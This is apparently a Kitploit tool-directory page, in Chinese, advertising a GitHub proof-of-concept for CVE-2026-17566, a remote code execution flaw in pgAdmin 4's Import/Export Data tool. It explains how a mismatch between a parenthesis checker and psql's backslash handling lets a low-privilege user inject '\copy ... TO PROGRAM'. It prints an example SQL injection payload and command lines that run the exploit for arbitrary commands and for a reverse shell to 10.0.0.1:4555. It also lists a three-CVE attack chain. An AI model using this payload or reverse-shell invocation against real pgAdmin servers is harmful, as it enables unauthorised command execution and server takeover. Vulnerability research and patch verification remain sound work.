Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-17566 — pgAdmin 4 导入/导出 RCE (CVE-2026-17566) PoC - 通过反斜杠转义不匹配实现 TO PROGRAM 注入 | Kitploit
工具/GitHubGitHub/hackspeak/cve-2026-17566
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用渗透测试
GitHubhackspeak/cve-2026-17566

CVE-2026-17566

pgAdmin 4 导入/导出 RCE (CVE-2026-17566) PoC - 通过反斜杠转义不匹配实现 TO PROGRAM 注入

查看仓库
116天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-17566 — pgAdmin 4 Import/Export Data RCE PoC

pgAdmin 4 Import/Export Data 工具远程代码执行 PoC。利用 _is_query_parens_balanced() 括号检查器与 psql 的反斜杠转义语义分歧,注入 \copy ... TO PROGRAM 在运行 pgAdmin 的服务器上执行任意命令。

背景攻击链:CVE-2026-17349(Workspaces 凭据泄露)→ CVE-2026-17351(AI Assistant 只读绕过)→ 本漏洞(RCE)。三者均只需低权限已认证用户。

漏洞简述

Import/Export Data 工具把用户 SQL 插进 Jinja 模板构造 psql \copy (...) 命令。手写的括号平衡检查器始终把 \' 当作转义引号(仅当 standard_conforming_strings=off 时正确);而 PostgreSQL 默认 standard_conforming_strings=on 时,psql 把反斜杠当普通字符,引号直接闭合。

root@kitploit:~
-- 示意 payload
SELECT 'a\') TO PROGRAM 'echo pwned' x'

检查器认为 ) 还在字符串里 → 括号"平衡"通过;psql 在 a\' 处闭合字符串,) 结束 \copy (...) 包裹,TO PROGRAM 'cmd' 成为活的指令,由 psql 的 popen() 执行。

  • CWE: CWE-78(OS 命令注入)/ CWE-115(输入误解释)
  • CVSS: 9.9(CVSS 3.1)/ 9.4(CVSS 4.0),作用域变更,低权限 + 无交互
  • 受影响: pgAdmin 4 < 9.18(自 _is_query_parens_balanced() 引入起);修复 commit 1496fabe
  • 相关: CVE-2025-12762 / CVE-2025-13780(psql TO PROGRAM 注入,同族)
  • 发现者: Arpit Jain(arpitjain099)

利用条件

  • 已认证的低权限 pgAdmin 用户(具备 tools_import_export_data 权限)
  • 网络可达 pgAdmin 服务
  • 目标为 pgAdmin 4 < 9.18 且 Import/Export 工具可用

用法

root@kitploit:~
export PGADMIN_PASSWORD='账户密码'

# 任意命令(结果写入服务器侧文件,便于观察)
python3 pgadmin4_rce_poc.py --url https://127.0.0.1:5050 \
    --user lowpriv --command 'id > /tmp/pgadmin_rce_proof'

# 反向 shell
python3 pgadmin4_rce_poc.py --url https://127.0.0.1:5050 \
    --user lowpriv --reverse 10.0.0.1:4555

流程:登录(自动处理 CSRF/session)→ 枚举服务器 → POST /import_export/job/<sid> 提交构造的 is_query_export 请求。

⚠️ 免责声明

仅供安全研究、漏洞验证与防御性测试使用。本脚本基于公开技术分析编写,未经真机验证,请求字段可能需按目标 pgAdmin 版本微调。请在授权测试环境运行,勿对未授权系统使用。

归属与参考

  • 本仓库为独立编写的 PoC(MIT License),技术依据公开资料
  • 官方 Issue #10213:括号检查器反斜杠语义错误
  • OpenCVE:CVE-2026-17566
  • NVD:CVE-2026-17566
  • 修复 commit:1496fabe
下载工具
参数说明
--urlpgAdmin 基础 URL
--user / --password(或 PGADMIN_PASSWORD)低权限账户
--command任意命令(不能含单引号)
--reverse HOST:PORT生成 bash 反向 shell
--server-id服务器 ID(默认自动取第一个)
--file导出文件名(构造 \copy 命令用,默认 /tmp/pgadmin_export.csv)
--no-verify跳过 TLS 证书校验